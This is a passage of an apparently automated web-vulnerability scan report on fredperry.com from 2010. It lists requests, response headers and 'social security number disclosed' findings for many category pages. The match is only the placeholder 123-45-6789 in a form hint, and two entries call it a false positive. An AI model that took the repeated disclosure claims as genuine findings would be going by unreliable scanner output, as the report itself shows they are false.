Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8ouf9mi5qpo5h66pih8ognai31; expires=Tue, 09-Nov-2010 17:11:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.50. http://www.fredperry.com/limited-edition/women/dresses/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d61hdbqdhv4s27cti0o8g0hir2; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.51. http://www.fredperry.com/limited-edition/women/footwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b17q1ojlmamg9ilg4ttf3oblp4; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.52. http://www.fredperry.com/limited-edition/women/jackets/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8h1ftlraornd04tqj79mkmj4l4; expires=Tue, 09-Nov-2010 17:11:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.53. http://www.fredperry.com/limited-edition/women/jessica-ogden/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=596f22tdrdod98cur9st4it5d2; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.54. http://www.fredperry.com/limited-edition/women/knitwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jbnq5a0ghsbnuogidg8q8buq30; expires=Tue, 09-Nov-2010 17:11:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.55. http://www.fredperry.com/limited-edition/women/new-styles/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d6rotfjofe32hk9nc8ps1euar3; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> new-sty
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.56. http://www.fredperry.com/limited-edition/women/shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l8cj4hjmhomdsrq9r9agpunqi5; expires=Tue, 09-Nov-2010 17:10:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.57. http://www.fredperry.com/limited-edition/women/shorts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1diifrosmkim4fmf8l7gpinjv6; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.58. http://www.fredperry.com/limited-edition/women/skirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hrcu60nic6e0i2909dujlk9531; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.59. http://www.fredperry.com/limited-edition/women/trousers/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3q1ler3pe6c91mm157pg5vrt97; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.60. http://www.fredperry.com/limited-edition/women/woven-shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9va65seurojgtt61835u38cr71; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.61. http://www.fredperry.com/men/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bcdqcqh0hj2cfdtt3hvrpf6se1; expires=Tue, 09-Nov-2010 16:55:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men - F
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.62. http://www.fredperry.com/men/jackets/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=js68k526o1mh73megv6u2sh8t0; expires=Tue, 09-Nov-2010 16:55:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's J
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.63. http://www.fredperry.com/men/knitwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9to2rddhlr3670e25cusgckem5; expires=Tue, 09-Nov-2010 16:55:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Knitwea
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.64. http://www.fredperry.com/men/shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:55:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c9adu0d89fm1e05tplls9nk9f1; expires=Tue, 09-Nov-2010 16:55:21 GMT; path=/; domain=www.fredperry.com
